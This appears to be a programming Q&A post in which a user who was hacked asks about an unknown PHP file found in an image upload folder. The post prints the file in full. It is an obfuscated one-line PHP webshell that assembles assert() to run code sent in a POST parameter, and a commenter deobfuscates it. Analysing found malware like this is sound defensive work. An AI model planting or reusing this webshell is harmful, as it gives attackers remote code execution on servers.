# Unknown PHP file in my upload folder, isn't malicious code?

Tags: php

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.

errot_db.php

```
<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
```

Comment: Why would you say it's not malicious code? If you remove all the comments, and rebuild the string, you get `assert(${"_POST"}[0-2-5])` - it's a minimal webshell.

Answer (score 1):

I just google dorked the code [here](http://www.5kik.com/phpnews/345.html) and it looks to some sort of malware/trojan aimed at IP address filtering on a webshell. You may need to translate the page to English.